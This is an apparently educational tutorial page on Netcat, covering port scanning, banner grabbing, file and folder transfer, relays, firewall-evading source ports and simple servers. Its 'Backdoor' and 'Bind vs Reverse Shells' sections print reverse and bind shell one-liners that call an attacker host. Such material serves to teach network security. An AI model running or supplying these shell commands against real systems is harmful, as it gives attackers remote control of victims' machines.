Netcat: The Swiss Army Knife

Read and write data across network connections.

NetworkingNetworkingSecurityTools

Learn how to use Netcat for everything from simple chat programs to backdoors and port scanning.

TOOL OF THE DAY

Meet Netcat

The tool that talks to networks. Read data. Write data. Find open doors. No fancy buttons, just raw power.

The Swiss Army Knife

People call Netcat the "Swiss Army knife" of networking. Why? Because it does almost everything. Instead of having ten different tools to check the internet, move files, or test security, you just need one. It is a tiny program that connects computers together.

Simple

It works right in your text terminal. No menus. No loading screens.

Flexible

It can send messages, send files, or even run programs on other computers.

For Everyone

Good guys use it to test limits. Bad guys use it to break in. It is a tool for both.

TCP: The Phone Call

Netcat can speak TCP. Think of TCP like a phone call. You dial a number, wait for the other person to say "Hello", and then you talk. You know for a fact they are listening. It is safe and reliable.

# Default Netcat uses TCP
nc target_computer 80

UDP: The Letter

Netcat can also speak UDP. Think of UDP like throwing a letter onto someone's porch. You don't know if they picked it up. You don't wait for a reply. You just throw it. It is very fast.

# Add -u to use UDP
nc -u target_computer 53

Use Case 1: Simple Chat

Talking Across Computers

You can use Netcat to chat between two computers. No chat app needed. Computer A opens a "listening port" (waiting for a knock). Computer B knocks on that door. Now they can type messages to each other.

--- Computer A (Listener) ---

user@compA:~$ nc -l -p 4444

# Waiting...

Hello Computer B!

Hi back! How are you?

--- Computer B (Talker) ---

user@compB:~$ nc 192.168.1.10 4444

# Connected!

Hello Computer B!

Hi back! How are you?

Port Scanning

Imagine a computer is a house with 65,000 doors (ports). Some doors are locked. Some doors are wide open. Netcat can quickly knock on a range of doors to see which ones are open.

-z tells Netcat to just knock, not try to talk.
-v tells Netcat to talk out loud and tell us what it finds.

# Scanning doors 20 to 80

nc -zv 192.168.1.5 20-80

Connection to 192.168.1.5 22 port [tcp/ssh] succeeded!

nc: connect to 192.168.1.5 port 23 (tcp) failed

Connection to 192.168.1.5 80 port [tcp/http] succeeded!

Banner Grabbing

What is inside the open door?

When you connect to an open port, the computer often sends a welcome message. This is called a "banner". It tells you exactly what software is running behind that door. This is super helpful to figure out what a server does.

user@home:~$ echo "" | nc server 22

SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5

# Ah! We now know it is an Ubuntu machine running OpenSSH version 8.2.

Moving Files Without USBs

You have a picture on Laptop A. You want it on Laptop B. No cloud, no flash drive. Just make a pipe between them using Netcat and push the file through.

Laptop B (Receiver) gets ready to catch:

nc -l -p 5555 > picture.jpg

Laptop A (Sender) throws the file into the pipe:

nc laptop_B_IP 5555 < picture.jpg

The Backdoor

This is why it is dangerous.

Netcat can map a network connection directly to a computer's command line (like `/bin/bash` or `cmd.exe`). If an attacker gets Netcat on your computer, they can tell it to quietly call them back. Once connected, they can type commands on their keyboard, and your computer will run them.

# Attacker waits for a call (Listener)

nc -l -p 9999

# Victim's computer is tricked into calling the attacker

nc attacker_ip 9999 -e /bin/bash

# The attacker now has full control of the victim's terminal

attacker@home:~$ whoami

victim_user

Fixing Broken Networks

When something doesn't work, Netcat helps you find the broken piece. Is your website down? Is it the web server software, or is a firewall blocking the door?

Step 1: Test the Door

Use nc -zv website.com 80. If it succeeds, the door is open. The network is fine. The website software is broken.

Step 2: Find the Wall

If the knock times out, a firewall is likely blocking you. Now you know you need to talk to the network team, not the website team.

Attackers Use It To:

Scan for weak open doors.
Read banners to find old software.
Setup secret backdoors (Reverse Shells).
Steal data by sending it through a pipe.

Defenders Use It To:

Check if firewalls are working correctly.
Prove a network path is open for a new app.
Read their own banners to ensure they hide versions.
Debug broken servers quickly without heavy tools.

Bind vs Reverse Shells

The Bind Shell

The victim opens a door on their computer and waits. The attacker connects to it. Firewalls usually block this because they stop strangers from knocking on your doors.

# Victim opens door 4444
nc -l -p 4444 -e /bin/bash

# Attacker walks in
nc victim_ip 4444

The Reverse Shell

The attacker opens a door and waits. The victim's computer reaches out and calls the attacker. Firewalls usually allow this because they let computers talk to the outside world.

# Attacker opens door 4444
nc -l -p 4444

# Victim calls the attacker
nc attacker_ip 4444 -e /bin/bash

Acting Like a Web Browser

A web browser is just a tool that sends text to a web server. You can do the exact same thing manually using Netcat. You connect to a website on port 80, type a specific greeting, and the website will hand you its code.

# 1. Connect to a website

nc example.com 80

# 2. Type this exact text and hit Enter twice

GET / HTTP/1.1

Host: example.com

# 3. The server replies with raw HTML!

<!doctype html>

<html><head><title>Example Domain</title>...

The Tiny Web Server

Need to share a simple web page with your team, but you don't have a real web server installed? Netcat can host a file and pretend to be a web server.

This command tells Netcat to listen on port 8080. When someone connects, it replies with the required "HTTP/1.1 200 OK" text, and then pushes the contents of `index.html` to them.

# Create a basic webpage

echo "<h1>Hello Team!</h1>" > index.html

# Serve it using an infinite loop

while true; do

echo -e "HTTP/1.1 200 OK\n\n$(cat index.html)" | nc -l -p 8080

done

Sending Entire Folders

Netcat sends streams of data, not folders. If you want to send a whole folder full of files, you have to pack it into a single box first. We do this by piping the tar command (which packs files) directly into Netcat.

1. Receiver Unpacks

Laptop B waits for the data stream and immediately unpacks it into a folder.

nc -l -p 5555 | tar xvf -

2. Sender Packs

Laptop A packs the folder into a stream and shoots it over to Laptop B.

tar cvf - /my_folder | nc laptop_B_IP 5555

Stay Open (-k)

Stop Netcat from quitting.

Usually, once a connection finishes, the Netcat listener turns off. If you want it to stay awake and wait for the next person to connect, add the -k flag (Keep-alive). This turns Netcat into a lasting server.

# Keeps listening after someone disconnects
nc -k -l -p 8888

IPv4 vs IPv6

The internet is changing how it labels computers. The old way is IPv4 (e.g., 192.168.1.1). The new way is IPv6 (e.g., fe80::1ff:fe23:4567). Netcat can use both. You can force it to use one or the other.

Force Old Style (IPv4) nc -4 target_computer 80

Force New Style (IPv6) nc -6 target_computer 80

The Middleman (Relays)

You can make your computer act as a bridge. A person connects to you, and your computer instantly forwards their traffic to a third computer. We do this by plugging two Netcat commands into each other using a special file called a fifo pipe.

# Create a special pipe file

mkfifo my_pipe

# Listen on port 9999, push traffic into pipe, send it to Website.com

nc -l -p 9999 < my_pipe | nc website.com 80 > my_pipe

# Act like we are sending from port 53 (DNS)

nc -p 53 target_computer 80

Sneaky Source Ports

Usually, when you connect to a server, your computer picks a random port to send *from*. However, some strict firewalls only allow traffic to pass if it comes from trusted ports like 53 (DNS) or 80 (HTTP).

You can trick the firewall by using the -p flag to force Netcat to send from a specific port.

Recording the Bytes

If a network connection fails, you might want to look at the exact data being sent back and forth. You can use the -o flag to record a "hex dump". This saves every single piece of data into a text file so you can study it later.

# Save all traffic to a file named 'network_log.txt'

nc -o network_log.txt website.com 80

# Inside network_log.txt, it looks like this:

< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.

< 00000010 0a 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4e # .Date: Thu, 09 N

The Upgrades: Ncat & Socat

Classic Netcat is amazing, but it has one big flaw: everything is sent in plain text. Anyone listening on the network can read your messages. Modern professionals often upgrade to newer tools when they need security.

Ncat

Made by the Nmap team. It is Netcat, but it adds SSL encryption. Bad guys can't read your traffic.

ncat --ssl target_ip 443

Socat

Netcat on steroids. It can connect anything to anything (files, networks, devices). Harder to learn, but infinitely powerful.

socat -d -d TCP4-LISTEN:80 ...

The Cheat Sheet

Listen for connection

nc -l -p [port]

Connect to a port

nc [IP address] [port]

Scan ports (TCP)

nc -zv [IP address] [port range]

Scan ports (UDP)

nc -zuv [IP address] [port range]

Time limit (timeout)

nc -w 3 [IP address] [port]

Netcat: The Swiss Army Knife

Port Scanning

The Tiny Web Server

Sneaky Source Ports

More in this series

Web Security

Networking

OSINT

Wireless

Cryptography

Forensics

Security